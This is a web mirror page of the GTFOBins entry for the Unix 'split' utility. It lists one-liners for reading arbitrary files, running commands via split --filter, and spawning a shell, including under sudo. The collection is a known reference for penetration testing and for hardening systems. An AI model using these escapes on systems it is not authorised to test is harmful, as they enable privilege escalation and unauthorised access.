This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-03 02:08:46 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
80d2b5cb260988de85186429130d232d769d7c27
GTFOBins.github.io
/
_gtfobins
/
split.md
Andrea Cardaci
fbe4b42890
Improve split
2020-12-20 21:15:58 +01:00
705 B
Raw
Blame
History
functions
functions
file-read
command
shell
sudo
code
LFILE=file_to_read TF=$(mktemp) split $LFILE $TF cat $TF*
description
code
Command execution using an existing or newly created file.
COMMAND=id TF=$(mktemp) split --filter=$COMMAND $TF
description
code
Command execution using stdin (and close it directly).
COMMAND=id echo | split --filter=$COMMAND /dev/stdin
description
code
The shell prompt is not printed.
split --filter=/bin/sh /dev/stdin
description
code
The shell prompt is not printed.
split --filter=/bin/sh /dev/stdin
Reference in New Issue
View Git Blame
Copy Permalink